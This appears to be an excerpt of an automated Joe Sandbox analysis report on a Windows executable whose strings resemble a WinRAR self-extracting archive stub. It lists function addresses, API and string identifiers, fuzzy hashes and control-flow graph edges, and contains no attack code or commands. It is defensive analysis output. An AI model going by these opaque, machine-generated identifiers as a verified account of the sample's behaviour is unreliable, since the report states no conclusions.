                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                                    • API String ID: 1496594111-2013832382
                                                                                    • Opcode ID: 5055fd89619171a3d64a845f42fd249c8978af8e628021f29e591253d8353463
                                                                                    • Instruction ID: baa4a6d09fb0e64eff1111cc7030fec6fb823a882a5bc2f899a59d65645899fa
                                                                                    • Opcode Fuzzy Hash: 5055fd89619171a3d64a845f42fd249c8978af8e628021f29e591253d8353463
                                                                                    • Instruction Fuzzy Hash: CD323031A19B829CE721AF28D8402E9F3A4FF6A355F800236DB5D46769EF3CD256C354
                                                                                    Function 00007FF7B8F1A9A0 Relevance: 124.0, APIs: 60, Strings: 10, Instructions: 1526windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Item$DialogMessageSendTextWindow
                                                                                    • String ID: %s %s$-el%u -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxpipe
                                                                                    • API String ID: 2770254507-1933896953
                                                                                    • Opcode ID: 763d24d17ccee29585ed1d86f292851b995c95d668b987f9603427506920234e
                                                                                    • Instruction ID: 4e494b65bb14ce709572f7bacac51c643de1498a125bf4536338a8c1541706c2
                                                                                    • Opcode Fuzzy Hash: 763d24d17ccee29585ed1d86f292851b995c95d668b987f9603427506920234e
                                                                                    • Instruction Fuzzy Hash: 2EE2A671A1968289EA20BB29D4502F9E351FFA7785FC04231DB4D0769EDF3CE646C328
                                                                                    Function 00007FF7B8F1C9A4 Relevance: 54.3, APIs: 19, Strings: 11, Instructions: 1780COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .lnk$.tmp$<br>$=$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
                                                                                    • API String ID: 0-81786609
                                                                                    • Opcode ID: a99eabaa1f0a77fa1100620014f1fe634b876181f41281ca063998fdf1054e65
                                                                                    • Instruction ID: 1a93b04acf36faaf464bbb4c2c6753a411c920e0f6ef684dbeb0c0764a1de5d5
                                                                                    • Opcode Fuzzy Hash: a99eabaa1f0a77fa1100620014f1fe634b876181f41281ca063998fdf1054e65
                                                                                    • Instruction Fuzzy Hash: ED03A132A1868299FB10FF68C4402ECE771EB62799FD00132EB1D56A9DDF78E586C354
                                                                                    Function 00007FF7B8F1FFD0 Relevance: 40.6, APIs: 18, Strings: 5, Instructions: 397sleeptimewindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1440 7ff7b8f1ffd0-7ff7b8f200e2 call 7ff7b8f0d7f8 GetCurrentProcess SetUserObjectInformationW call 7ff7b8f055f8 call 7ff7b8f18ccc call 7ff7b8f35750 call 7ff7b8f19288 1451 7ff7b8f20119-7ff7b8f20133 1440->1451 1452 7ff7b8f200e4-7ff7b8f200f9 1440->1452 1455 7ff7b8f2016a-7ff7b8f20184 1451->1455 1456 7ff7b8f20135-7ff7b8f2014a 1451->1456 1453 7ff7b8f200fb-7ff7b8f2010e 1452->1453 1454 7ff7b8f20114 call 7ff7b8f21c5c 1452->1454 1453->1454 1457 7ff7b8f20678-7ff7b8f2067d call 7ff7b8f26834 1453->1457 1454->1451 1461 7ff7b8f201bb-7ff7b8f201d5 1455->1461 1462 7ff7b8f20186-7ff7b8f2019b 1455->1462 1459 7ff7b8f2014c-7ff7b8f2015f 1456->1459 1460 7ff7b8f20165 call 7ff7b8f21c5c 1456->1460 1475 7ff7b8f2067e-7ff7b8f20683 call 7ff7b8f26834 1457->1475 1459->1457 1459->1460 1460->1455 1464 7ff7b8f201d7-7ff7b8f201ec 1461->1464 1465 7ff7b8f2020c-7ff7b8f20218 GetCommandLineW 1461->1465 1467 7ff7b8f2019d-7ff7b8f201b0 1462->1467 1468 7ff7b8f201b6 call 7ff7b8f21c5c 1462->1468 1471 7ff7b8f20207 call 7ff7b8f21c5c 1464->1471 1472 7ff7b8f201ee-7ff7b8f20201 1464->1472 1473 7ff7b8f203e9-7ff7b8f203ff call 7ff7b8f05758 1465->1473 1474 7ff7b8f2021e-7ff7b8f20255 call 7ff7b8f268ac call 7ff7b8ef12c0 call 7ff7b8f1c56c 1465->1474 1467->1457 1467->1468 1468->1461 1471->1465 1472->1457 1472->1471 1484 7ff7b8f20429-7ff7b8f2057b call 7ff7b8ef1fa8 SetEnvironmentVariableW GetLocalTime call 7ff7b8f09d6c SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff7b8f1a824 call 7ff7b8f08ae0 call 7ff7b8f1604c * 2 DialogBoxParamW call 7ff7b8f16144 * 2 1473->1484 1485 7ff7b8f20401-7ff7b8f20426 call 7ff7b8ef1fa8 call 7ff7b8f350b0 1473->1485 1501 7ff7b8f20257-7ff7b8f20269 1474->1501 1502 7ff7b8f20289-7ff7b8f20290 1474->1502 1487 7ff7b8f20684-7ff7b8f206c4 call 7ff7b8f26834 call 7ff7b8f21330 1475->1487 1555 7ff7b8f2057d Sleep 1484->1555 1556 7ff7b8f20583-7ff7b8f2058a 1484->1556 1485->1484 1513 7ff7b8f206c9-7ff7b8f206ff 1487->1513 1507 7ff7b8f2026b-7ff7b8f2027e 1501->1507 1508 7ff7b8f20284 call 7ff7b8f21c5c 1501->1508 1503 7ff7b8f2037e-7ff7b8f203a8 call 7ff7b8f268ac call 7ff7b8ef12c0 call 7ff7b8f1f520 1502->1503 1504 7ff7b8f20296-7ff7b8f202d7 call 7ff7b8ef2c04 call 7ff7b8ef2830 call 7ff7b8ef2d94 1502->1504 1527 7ff7b8f203ad-7ff7b8f203b5 1503->1527 1531 7ff7b8f20327-7ff7b8f20337 call 7ff7b8ef1fa8 1504->1531 1532 7ff7b8f202d9-7ff7b8f20322 call 7ff7b8f19988 call 7ff7b8f1f520 call 7ff7b8f0b2fc call 7ff7b8f0b444 call 7ff7b8f0b4b4 1504->1532 1507->1475 1507->1508 1508->1502 1517 7ff7b8f20701 1513->1517 1517->1517 1527->1473 1530 7ff7b8f203b7-7ff7b8f203c9 1527->1530 1535 7ff7b8f203cb-7ff7b8f203de 1530->1535 1536 7ff7b8f203e4 call 7ff7b8f21c5c 1530->1536 1545 7ff7b8f20339-7ff7b8f20346 1531->1545 1546 7ff7b8f20372-7ff7b8f2037c call 7ff7b8ef2c2c 1531->1546 1532->1531 1535->1536 1541 7ff7b8f20672-7ff7b8f20677 call 7ff7b8f26834 1535->1541 1536->1473 1541->1457 1551 7ff7b8f20348-7ff7b8f2035b 1545->1551 1552 7ff7b8f20361-7ff7b8f2036d call 7ff7b8f21c5c 1545->1552 1546->1473 1551->1487 1551->1552 1552->1546 1555->1556 1561 7ff7b8f2058c call 7ff7b8f1973c 1556->1561 1562 7ff7b8f20591-7ff7b8f205b4 call 7ff7b8f0b228 DeleteObject 1556->1562 1561->1562 1570 7ff7b8f205bc-7ff7b8f205c2 1562->1570 1571 7ff7b8f205b6 DeleteObject 1562->1571 1572 7ff7b8f205de-7ff7b8f205ef 1570->1572 1573 7ff7b8f205c4-7ff7b8f205cb 1570->1573 1571->1570 1574 7ff7b8f205f1-7ff7b8f205fd call 7ff7b8f1f638 CloseHandle 1572->1574 1575 7ff7b8f20603-7ff7b8f20610 1572->1575 1573->1572 1576 7ff7b8f205cd-7ff7b8f205d9 call 7ff7b8efb160 1573->1576 1574->1575 1578 7ff7b8f20612-7ff7b8f2061f 1575->1578 1579 7ff7b8f20635-7ff7b8f2063a call 7ff7b8f18d44 1575->1579 1576->1572 1582 7ff7b8f2062f-7ff7b8f20631 1578->1582 1583 7ff7b8f20621-7ff7b8f20629 1578->1583 1587 7ff7b8f2063f-7ff7b8f20671 call 7ff7b8f21d70 1579->1587 1582->1579 1586 7ff7b8f20633 1582->1586 1583->1579 1585 7ff7b8f2062b-7ff7b8f2062d 1583->1585 1585->1579 1586->1579
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentVariable_invalid_parameter_noinfo_noreturn$CurrentHandleObject$AddressDeleteDirectoryModuleProc$CloseCommandDialogIconInformationInitializeLineLoadLocalMallocParamProcessSleepTimeUserswprintf
                                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxpipe
                                                                                    • API String ID: 2472672504-4073604590
                                                                                    • Opcode ID: 71cecf12ebfe1a4c16647de5c6781db4d0b830b8743af4e4a126b66d11010dd4
                                                                                    • Instruction ID: 5aba3d95fce814300d59a140e1716f6b990fa20a6dcdcc1fe530bb50262f4aa6
                                                                                    • Opcode Fuzzy Hash: 71cecf12ebfe1a4c16647de5c6781db4d0b830b8743af4e4a126b66d11010dd4
                                                                                    • Instruction Fuzzy Hash: 81129672E1878289EA10EF68D8411FDE361BFA6795F800231EB5D06A9DDF7CE542C358
                                                                                    Function 00007FF7B8F096B4 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 286windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1590 7ff7b8f096b4-7ff7b8f09738 call 7ff7b8f09d6c call 7ff7b8f1055c call 7ff7b8f268e0 1597 7ff7b8f0973a 1590->1597 1598 7ff7b8f0979d-7ff7b8f0980b call 7ff7b8f08638 GetWindowRect GetClientRect 1590->1598 1599 7ff7b8f09741-7ff7b8f09744 1597->1599 1606 7ff7b8f09811-7ff7b8f09813 1598->1606 1607 7ff7b8f098d3-7ff7b8f098d8 1598->1607 1601 7ff7b8f09789-7ff7b8f09797 1599->1601 1602 7ff7b8f09746-7ff7b8f09758 call 7ff7b8f29740 1599->1602 1601->1599 1605 7ff7b8f09799 1601->1605 1602->1601 1614 7ff7b8f0975a-7ff7b8f09775 call 7ff7b8f08a34 1602->1614 1605->1598 1608 7ff7b8f09819-7ff7b8f098ce GetWindowLongPtrW call 7ff7b8f5e2c0 GetWindowRect 1606->1608 1609 7ff7b8f09910-7ff7b8f09937 GetSystemMetrics GetWindow 1606->1609 1607->1609 1610 7ff7b8f098da-7ff7b8f098fe call 7ff7b8f087e0 1607->1610 1608->1607 1615 7ff7b8f0993d-7ff7b8f09942 1609->1615 1616 7ff7b8f09aa6-7ff7b8f09acf call 7ff7b8f21d70 1609->1616 1610->1609 1622 7ff7b8f09900-7ff7b8f0990a SetWindowTextW 1610->1622 1614->1601 1626 7ff7b8f09777-7ff7b8f09783 SetDlgItemTextW 1614->1626 1615->1616 1621 7ff7b8f09948 1615->1621 1625 7ff7b8f0994d-7ff7b8f09953 1621->1625 1622->1609 1625->1616 1627 7ff7b8f09959-7ff7b8f09a13 GetWindowRect call 7ff7b8ef22c8 1625->1627 1626->1601 1630 7ff7b8f09a5e-7ff7b8f09a99 call 7ff7b8f5e2c0 GetWindow 1627->1630 1631 7ff7b8f09a15-7ff7b8f09a27 call 7ff7b8f5e2a0 1627->1631 1630->1616 1637 7ff7b8f09a9b-7ff7b8f09aa0 1630->1637 1631->1630 1636 7ff7b8f09a29-7ff7b8f09a5c SendMessageW 1631->1636 1636->1630 1637->1616 1637->1625
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Rect$Text$ByteCharClientItemLongMessageMetricsMultiSendSystemWideswprintf
                                                                                    • String ID: $%s:$CAPTION$ComboBox
                                                                                    • API String ID: 3712066475-505312980
                                                                                    • Opcode ID: 6a909236ad96c565540c89ef6bc63b6bd32faa10e6ebb83ac9eee940cfc6341d
                                                                                    • Instruction ID: a41fabb4b0ef12e168e8ff13583329c6790c0cf8ba24ba21d12970681c7749bb
                                                                                    • Opcode Fuzzy Hash: 6a909236ad96c565540c89ef6bc63b6bd32faa10e6ebb83ac9eee940cfc6341d
                                                                                    • Instruction Fuzzy Hash: CCB1E432B186414EE718EF2DA8006AAE761FB96785F844135EF9D47B5DDE3CE502CB10
                                                                                    Function 00007FF7B8F17EA8 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101memorywindowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                    • String ID: PNG
                                                                                    • API String ID: 211097158-364855578
                                                                                    • Opcode ID: 99d0e2308b5a7d8505ac282d5f273e060b141aa6daacbcea06e7be9776bc6a34
                                                                                    • Instruction ID: 6c0f4681e021950d6b87214c08d9c0e2e138ecca82d7a28d1279fbe962e341c5
                                                                                    • Opcode Fuzzy Hash: 99d0e2308b5a7d8505ac282d5f273e060b141aa6daacbcea06e7be9776bc6a34
                                                                                    • Instruction Fuzzy Hash: 89413031A19B068AEE04AB19D444379E3A0EF9AF92F840135DF0D4736CEF7CE4468364
                                                                                    Function 00007FF7B8EFE3D0 Relevance: 18.1, APIs: 9, Strings: 1, Instructions: 580COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 2044 7ff7b8efe3d0-7ff7b8efe414 2045 7ff7b8efe416-7ff7b8efe41e call 7ff7b8ef3cac 2044->2045 2046 7ff7b8efe423-7ff7b8efe43a call 7ff7b8ef3cac 2044->2046 2051 7ff7b8efe9d4-7ff7b8efe9fa call 7ff7b8f21d70 2045->2051 2052 7ff7b8efe46c-7ff7b8efe48b 2046->2052 2053 7ff7b8efe43c-7ff7b8efe456 call 7ff7b8f0573c call 7ff7b8f065c0 2046->2053 2056 7ff7b8efe490-7ff7b8efe4ae call 7ff7b8ef8a94 2052->2056 2057 7ff7b8efe48d 2052->2057 2053->2052 2068 7ff7b8efe458-7ff7b8efe462 call 7ff7b8f063f4 2053->2068 2063 7ff7b8efe4b3-7ff7b8efe4c0 2056->2063 2064 7ff7b8efe4b0 2056->2064 2057->2056 2066 7ff7b8efe4c6-7ff7b8efe4ca 2063->2066 2067 7ff7b8efe8ab-7ff7b8efe8b2 2063->2067 2064->2063 2066->2067 2069 7ff7b8efe4d0-7ff7b8efe4dc call 7ff7b8f063f4 2066->2069 2071 7ff7b8efe8b4 2067->2071 2072 7ff7b8efe8c9 2067->2072 2068->2052 2079 7ff7b8efe464-7ff7b8efe467 call 7ff7b8f04e2c 2068->2079 2069->2067 2085 7ff7b8efe4e2-7ff7b8efe51a call 7ff7b8f10acc 2069->2085 2076 7ff7b8efe8b9-7ff7b8efe8c1 2071->2076 2073 7ff7b8efe8cc-7ff7b8efe8e5 call 7ff7b8f070b0 2072->2073 2090 7ff7b8efe953-7ff7b8efe95c call 7ff7b8ef1fa8 2073->2090 2091 7ff7b8efe8e7-7ff7b8efe8ef 2073->2091 2080 7ff7b8efe961-7ff7b8efe964 2076->2080 2081 7ff7b8efe8c7 2076->2081 2079->2052 2082 7ff7b8efe986-7ff7b8efe991 2080->2082 2083 7ff7b8efe966-7ff7b8efe981 call 7ff7b8ef2044 2080->2083 2081->2073 2088 7ff7b8efe993-7ff7b8efe99b call 7ff7b8f067ac 2082->2088 2089 7ff7b8efe9a0-7ff7b8efe9a3 2082->2089 2083->2082 2106 7ff7b8efe723-7ff7b8efe738 2085->2106 2107 7ff7b8efe520-7ff7b8efe537 call 7ff7b8f065c0 2085->2107 2088->2089 2089->2051 2097 7ff7b8efe9a5-7ff7b8efe9b8 2089->2097 2090->2080 2095 7ff7b8efe924-7ff7b8efe94f call 7ff7b8f350b0 2091->2095 2096 7ff7b8efe8f1-7ff7b8efe904 2091->2096 2095->2090 2101 7ff7b8efe906-7ff7b8efe919 2096->2101 2102 7ff7b8efe91f call 7ff7b8f21c5c 2096->2102 2103 7ff7b8efe9cf call 7ff7b8f21c5c 2097->2103 2104 7ff7b8efe9ba-7ff7b8efe9cd 2097->2104 2101->2102 2111 7ff7b8efea2b-7ff7b8efea8b call 7ff7b8f26834 call 7ff7b8f21ea0 call 7ff7b8ef33a8 2101->2111 2102->2095 2103->2051 2104->2103 2113 7ff7b8efe9fb-7ff7b8efea00 call 7ff7b8f26834 2104->2113 2109 7ff7b8efe8a6-7ff7b8efe8a9 2106->2109 2110 7ff7b8efe73e-7ff7b8efe74f 2106->2110 2125 7ff7b8efe71e 2107->2125 2126 7ff7b8efe53d-7ff7b8efe541 2107->2126 2109->2076 2110->2109 2118 7ff7b8efe755-7ff7b8efe76d 2110->2118 2155 7ff7b8efea96-7ff7b8efeaa1 call 7ff7b8f02058 2111->2155 2156 7ff7b8efea8d-7ff7b8efea94 2111->2156 2127 7ff7b8efea01-7ff7b8efea06 call 7ff7b8f26834 2113->2127 2122 7ff7b8efe773-7ff7b8efe7e0 call 7ff7b8ef12c0 call 7ff7b8efd5bc 2118->2122 2123 7ff7b8efea1f-7ff7b8efea24 call 7ff7b8ef6ddc 2118->2123 2152 7ff7b8efe7e2-7ff7b8efe809 call 7ff7b8ef1fa8 call 7ff7b8f350b0 2122->2152 2153 7ff7b8efe80e-7ff7b8efe81f call 7ff7b8ef1fa8 2122->2153 2141 7ff7b8efea25-7ff7b8efea2a call 7ff7b8f26834 2123->2141 2125->2106 2126->2125 2131 7ff7b8efe547-7ff7b8efe54b 2126->2131 2139 7ff7b8efea07-7ff7b8efea0c call 7ff7b8ef6ddc 2127->2139 2131->2125 2132 7ff7b8efe551-7ff7b8efe569 2131->2132 2138 7ff7b8efe56f-7ff7b8efe60b call 7ff7b8ef12c0 * 2 call 7ff7b8ef11ec call 7ff7b8efd5bc 2132->2138 2132->2139 2195 7ff7b8efe60d-7ff7b8efe614 2138->2195 2196 7ff7b8efe677-7ff7b8efe692 call 7ff7b8ef1fa8 * 2 2138->2196 2158 7ff7b8efea0d-7ff7b8efea12 call 7ff7b8f26834 2139->2158 2141->2111 2152->2153 2166 7ff7b8efe854-7ff7b8efe86e 2153->2166 2167 7ff7b8efe821-7ff7b8efe834 2153->2167 2168 7ff7b8efeaa6-7ff7b8efeaa8 2155->2168 2161 7ff7b8efeaae-7ff7b8efeab4 call 7ff7b8ef3ef4 2156->2161 2179 7ff7b8efea13-7ff7b8efea18 call 7ff7b8f26834 2158->2179 2178 7ff7b8efeab9-7ff7b8efeabb 2161->2178 2166->2071 2177 7ff7b8efe870-7ff7b8efe882 2166->2177 2173 7ff7b8efe836-7ff7b8efe849 2167->2173 2174 7ff7b8efe84f call 7ff7b8f21c5c 2167->2174 2168->2161 2175 7ff7b8efecdf-7ff7b8efece3 call 7ff7b8ef36e0 2168->2175 2173->2141 2173->2174 2174->2166 2193 7ff7b8efece8-7ff7b8efed15 call 7ff7b8f21d70 2175->2193 2183 7ff7b8efe714-7ff7b8efe719 call 7ff7b8f21c5c 2177->2183 2184 7ff7b8efe888-7ff7b8efe89b 2177->2184 2178->2175 2185 7ff7b8efeac1-7ff7b8efeac8 2178->2185 2198 7ff7b8efea19-7ff7b8efea1e call 7ff7b8f26834 2179->2198 2183->2071 2184->2127 2190 7ff7b8efe8a1 2184->2190 2185->2175 2191 7ff7b8efeace-7ff7b8efead2 call 7ff7b8ef45c4 2185->2191 2190->2183 2204 7ff7b8efead7-7ff7b8efeae7 2191->2204 2202 7ff7b8efe616-7ff7b8efe624 2195->2202 2203 7ff7b8efe647-7ff7b8efe672 call 7ff7b8f350b0 2195->2203 2225 7ff7b8efe694-7ff7b8efe6a7 2196->2225 2226 7ff7b8efe6c7-7ff7b8efe6e1 2196->2226 2198->2123 2209 7ff7b8efe626-7ff7b8efe639 2202->2209 2210 7ff7b8efe642 call 7ff7b8f21c5c 2202->2210 2203->2196 2211 7ff7b8efec82-7ff7b8efec89 call 7ff7b8efed24 2204->2211 2212 7ff7b8efeaed-7ff7b8efeb69 call 7ff7b8ef8a94 call 7ff7b8f06be4 call 7ff7b8f03244 2204->2212 2209->2179 2216 7ff7b8efe63f 2209->2216 2210->2203 2220 7ff7b8efec8e-7ff7b8efec9d 2211->2220 2240 7ff7b8efebf9-7ff7b8efebfb 2212->2240 2216->2210 2223 7ff7b8efeca2-7ff7b8efeca6 2220->2223 2224 7ff7b8efec9f 2220->2224 2228 7ff7b8efecbe-7ff7b8efecd6 call 7ff7b8ef6754 call 7ff7b8efedf8 2223->2228 2229 7ff7b8efeca8-7ff7b8efecb9 call 7ff7b8f0ff98 2223->2229 2224->2223 2230 7ff7b8efe6c2 call 7ff7b8f21c5c 2225->2230 2231 7ff7b8efe6a9-7ff7b8efe6bc 2225->2231 2226->2071 2232 7ff7b8efe6e7-7ff7b8efe6f9 2226->2232 2244 7ff7b8efecdb-7ff7b8efecdd 2228->2244 2229->2228 2230->2226 2231->2158 2231->2230 2232->2183 2237 7ff7b8efe6fb-7ff7b8efe70e 2232->2237 2237->2183 2237->2198 2242 7ff7b8efec01-7ff7b8efec09 2240->2242 2243 7ff7b8efeb6e-7ff7b8efeb7b 2240->2243 2245 7ff7b8efec3e-7ff7b8efec4d 2242->2245 2246 7ff7b8efec0b-7ff7b8efec1e 2242->2246 2247 7ff7b8efebb0-7ff7b8efebef call 7ff7b8f06be4 2243->2247 2248 7ff7b8efeb7d-7ff7b8efeb90 2243->2248 2244->2175 2244->2228 2245->2211 2254 7ff7b8efec4f-7ff7b8efec62 2245->2254 2252 7ff7b8efec20-7ff7b8efec33 2246->2252 2253 7ff7b8efec39 call 7ff7b8f21c5c 2246->2253 2247->2240 2262 7ff7b8efebf4 call 7ff7b8f03244 2247->2262 2249 7ff7b8efeb92-7ff7b8efeba5 2248->2249 2250 7ff7b8efebab call 7ff7b8f21c5c 2248->2250 2249->2250 2255 7ff7b8efed1c-7ff7b8efed23 call 7ff7b8f26834 2249->2255 2250->2247 2252->2253 2252->2255 2253->2245 2259 7ff7b8efec64-7ff7b8efec77 2254->2259 2260 7ff7b8efec7d call 7ff7b8f21c5c 2254->2260 2259->2260 2263 7ff7b8efed16-7ff7b8efed1b call 7ff7b8f26834 2259->2263 2260->2211 2262->2240 2263->2255
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: \
                                                                                    • API String ID: 0-2967466578
                                                                                    • Opcode ID: 513fb8f1c48c0b5c2993fce7b4b7eee8d606bd65c6b8a324c84ac7c2581c31ef
                                                                                    • Instruction ID: c0c88f6b499f520035b0c63c31b70a98671b9cf1a5c558650021106be9ddb2e3
                                                                                    • Opcode Fuzzy Hash: 513fb8f1c48c0b5c2993fce7b4b7eee8d606bd65c6b8a324c84ac7c2581c31ef
                                                                                    • Instruction Fuzzy Hash: 6B42D562F18B8285FA10EB69D4401ADE361EB967A4FD04231EB5C17ADDDF3CE586C318
